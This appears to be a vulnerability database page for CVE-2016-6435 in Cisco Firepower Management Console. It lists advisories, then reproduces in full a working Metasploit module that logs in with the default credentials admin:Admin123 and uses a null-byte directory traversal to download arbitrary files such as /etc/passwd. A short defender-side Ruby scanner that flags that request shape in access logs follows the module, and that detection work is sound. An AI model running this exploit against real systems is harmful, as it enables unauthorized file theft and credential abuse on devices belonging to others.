| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2016-6435 | 29 May 2018 15:50 | – | circl |
| Cisco Firepower Management Center Console Local File Inclusion Vulnerability | 5 Oct 2016 16:00 | – | cisco |
| Cisco Firepower Threat Management Console Remote Command Execution Vulnerability | 8 Oct 2016 00:00 | – | cnvd |
| Cisco Firepower Management Center Arbitrary File Read (CVE-2016-6435) | 20 Dec 2020 00:00 | – | checkpoint_advisories |
| CVE-2016-6435 | 6 Oct 2016 10:00 | – | cve |
| CVE-2016-6435 | 6 Oct 2016 10:00 | – | cvelist |
| Cisco Firepower Threat Management Console 6.0.1 - Local File Inclusion | 5 Oct 2016 00:00 | – | exploitdb |
| Cisco Firepower Threat Management Console 6.0.1 - Local File Inclusion | 5 Oct 2016 00:00 | – | exploitpack |
| Cisco Firepower Threat Management Console Local File Inclusion | 5 Oct 2016 00:00 | – | korelogic |
| Cisco Firepower Management Console 6.0 Post Auth Report Download Directory Traversal | 9 Jan 2017 20:39 | – | metasploit |
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Cisco Firepower Management Console 6.0 Post Auth Report Download Directory Traversal",
      'Description'    => %q{
        This module exploits a directory traversal vulnerability in Cisco Firepower Management
        under the context of www user. Authentication is required to exploit this vulnerability.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Matt',   # Original discovery && PoC
          'sinn3r', # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2016-6435'],
          ['URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking']
        ],
      'DisclosureDate' => '2016-10-10',
      'DefaultOptions' =>
        {
          'RPORT'      => 443,
          'SSL'        => true,
          'SSLVersion' => 'Auto'
        }
    ))

    register_options(
      [
        # admin:Admin123 is the default credential for 6.0.1
        OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']),
        OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']),
        OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),
        OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/passwd'])
      ])
  end

  def do_login(ip)
    console_user = datastore['USERNAME']
    console_pass = datastore['PASSWORD']
    uri          = normalize_uri(target_uri.path, 'login.cgi')

    print_status("Attempting to login in as #{console_user}:#{console_pass}")

    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => uri,
      'vars_post' => {
        'username' => console_user,
        'password' => console_pass,
        'target'   => ''
      }
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')
    end

    res_cookie = res.get_cookies
    if res.code == 302 && res_cookie.include?('CGISESSID')
      cgi_sid = res_cookie.scan(/CGISESSID=(\w+);/).flatten.first
      vprint_status("CGI Session ID: #{cgi_sid}")
      print_good("Authenticated as #{console_user}:#{console_pass}")
      report_cred(ip: ip, user: console_user, password: console_pass)
      return cgi_sid
    end

    nil
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: rport,
      service_name: 'cisco',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: DateTime.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def download_file(cgi_sid, file)
    file_path = "../../..#{Rex::FileUtils.normalize_unix_path(file)}\x00"
    print_status("Requesting: #{file_path}")

    send_request_cgi({
      'method'   => 'GET',
      'cookie'   => "CGISESSID=#{cgi_sid}",
      'uri'      => normalize_uri(target_uri.path, 'events/reports/view.cgi'),
      'vars_get' => {
        'download' => '1',
        'files'    => file_path
      }
    })
  end

  def remote_file_exists?(res)
    (
      res.headers['Content-Disposition'] &&
      res.headers['Content-Disposition'].match(/attachment; filename=/) &&
      res.headers['Content-Type'] &&
      res.headers['Content-Type'] == 'application/octet-stream'
    )
  end

  def save_file(res, ip)
    fname = res.headers['Content-Disposition'].scan(/filename=(.+)/).flatten.first || File.basename(datastore['FILEPATH'])

    path = store_loot(
      'cisco.https',
      'application/octet-stream',
      ip,
      res.body,
      fname
    )

    print_good("File saved in: #{path}")
  end

  def run_host(ip)
    cgi_sid = do_login(ip)

    unless cgi_sid
      fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID')
    end

    res = download_file(cgi_sid, datastore['FILEPATH'])

    if res.nil?
      print_error("Connection timed out while downloading: #{datastore['FILEPATH']}")
    elsif remote_file_exists?(res)
      save_file(res, ip)
    else
      print_error("Remote file not found: #{datastore['FILEPATH']}")
    end
  end
end
```
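A defender-side check for the request shape the module above sends (`events/reports/view.cgi` with a `files` value carrying `..` segments and a trailing null byte), as an added example that is not part of the module or of Metasploit. The combined access-log format, the sample log lines and the names `scan`, `traversal_reasons` and `fully_decode` are assumptions constructed for illustration.

```ruby
require 'uri'

# Constructed sample lines; the combined log format is an assumption, so
# adjust LOG_RE to the web server that fronts the management console.
SAMPLE_LOG = <<~LOG
  198.51.100.7 - - [10/Oct/2016:13:55:36 +0000] "GET /events/reports/view.cgi?download=1&files=../../../etc/passwd%00 HTTP/1.1" 200 1432
  198.51.100.7 - - [10/Oct/2016:13:55:40 +0000] "GET /events/reports/view.cgi?download=1&files=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 1432
  203.0.113.20 - - [10/Oct/2016:14:02:11 +0000] "GET /events/reports/view.cgi?download=1&files=weekly_summary.pdf HTTP/1.1" 200 88211
  203.0.113.20 - - [10/Oct/2016:14:02:15 +0000] "GET /login.cgi HTTP/1.1" 200 5120
LOG
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>\S+) (?<target>\S+) [^"]*" (?<status>\d{3}) /
REPORT_PATH = %r{/events/reports/view\.cgi\z}

# Percent-decode a bounded number of times; malformed escapes are left as-is.
def fully_decode(value, rounds = 3)
  rounds.times do
    decoded = URI.decode_www_form_component(value)
    return decoded if decoded == value
    value = decoded
  end
  value
rescue ArgumentError
  value
end

# Reasons a "files" value matches the traversal shape shown on this page.
def traversal_reasons(raw)
  value = fully_decode(raw).scrub
  reasons = []
  reasons << 'null byte' if value.include?("\x00")
  reasons << 'dot-dot segment' if value.split(%r{[/\\]}).include?('..')
  reasons
end

# One finding per report-download request whose "files" value is suspicious.
def scan(log_text)
  log_text.each_line.map do |line|
    m = LOG_RE.match(line) or next
    path, query = m[:target].split('?', 2)
    next unless path =~ REPORT_PATH && query
    files = query.split('&').map { |kv| kv.split('=', 2) }
                 .select { |k, _| k == 'files' }.map { |_, v| v.to_s }
    reasons = files.flat_map { |v| traversal_reasons(v) }.uniq
    next if reasons.empty?
    { ip: m[:ip], time: m[:ts], status: m[:status].to_i, reasons: reasons }
  end.compact
end

scan(SAMPLE_LOG).each { |f| puts f } if __FILE__ == $PROGRAM_NAME
```

A finding with status 200 on this path deserves a look at the response size and at the session that issued it, since the request requires an authenticated console session.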